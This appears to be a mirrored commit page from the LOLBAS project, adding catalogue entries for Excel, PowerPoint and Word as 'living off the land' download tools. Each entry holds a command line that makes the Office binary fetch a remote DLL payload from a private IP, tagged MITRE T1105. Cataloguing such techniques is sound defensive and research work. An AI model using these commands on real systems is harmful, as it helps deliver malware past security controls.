mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Added Office binaries from jreegun to the project. Pull request 42
This commit is contained in:
parent
ed266c0983
commit
0644ac30d7
37
yml/OtherMSBinaries/Excel.yml
Normal file
37
yml/OtherMSBinaries/Excel.yml
Normal file
@ -0,0 +1,37 @@
|
||||
---
|
||||
Name: Excel.exe
|
||||
Description: Microsoft Office binary.
|
||||
Author: 'Reegun J (OCBC Bank)'
|
||||
Created: '2019-07-19'
|
||||
Commands:
|
||||
- Command: Excel.exe "http://192.168.1.10/TeamsAddinLoader.dll"
|
||||
Description: Downloads payload from remote server
|
||||
Usecase: It will download a remote payload and place it in the cache folder
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
|
||||
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office16\Excel.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe
|
||||
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office15\Excel.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe
|
||||
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office14\Excel.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
|
||||
Resources:
|
||||
- Link: https://twitter.com/reegun21/status/1150032506504151040
|
||||
- Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
|
||||
Acknowledgement:
|
||||
- Person: Reegun J (OCBC Bank)
|
||||
Handle: '@reegun21'
|
||||
---
|
37
yml/OtherMSBinaries/Powerpnt.yml
Normal file
37
yml/OtherMSBinaries/Powerpnt.yml
Normal file
@ -0,0 +1,37 @@
|
||||
---
|
||||
Name: Powerpnt.exe
|
||||
Description: Microsoft Office binary.
|
||||
Author: 'Reegun J (OCBC Bank)'
|
||||
Created: '2019-07-19'
|
||||
Commands:
|
||||
- Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
|
||||
Description: Downloads payload from remote server
|
||||
Usecase: It will download a remote payload and place it in the cache folder
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
|
||||
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office16\Powerpnt.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe
|
||||
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office15\Powerpnt.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe
|
||||
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office14\Powerpnt.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office12\Powerpnt.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office12\Powerpnt.exe
|
||||
Resources:
|
||||
- Link: https://twitter.com/reegun21/status/1150032506504151040
|
||||
- Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
|
||||
Acknowledgement:
|
||||
- Person: Reegun J (OCBC Bank)
|
||||
Handle: '@reegun21'
|
||||
---
|
37
yml/OtherMSBinaries/Winword.yml
Normal file
37
yml/OtherMSBinaries/Winword.yml
Normal file
@ -0,0 +1,37 @@
|
||||
---
|
||||
Name: Winword.exe
|
||||
Description: Microsoft Office binary.
|
||||
Author: 'Reegun J (OCBC Bank)'
|
||||
Created: '2019-07-19'
|
||||
Commands:
|
||||
- Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
|
||||
Description: Downloads payload from remote server
|
||||
Usecase: It will download a remote payload and place it in the cache folder
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
|
||||
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office16\winword.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe
|
||||
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office15\winword.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office15\winword.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe
|
||||
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office14\winword.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office14\winword.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
|
||||
Resources:
|
||||
- Link: https://twitter.com/reegun21/status/1150032506504151040
|
||||
- Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
|
||||
Acknowledgement:
|
||||
- Person: Reegun J (OCBC Bank)
|
||||
Handle: '@reegun21'
|
||||
---
|
Loading…
Reference in New Issue
Block a user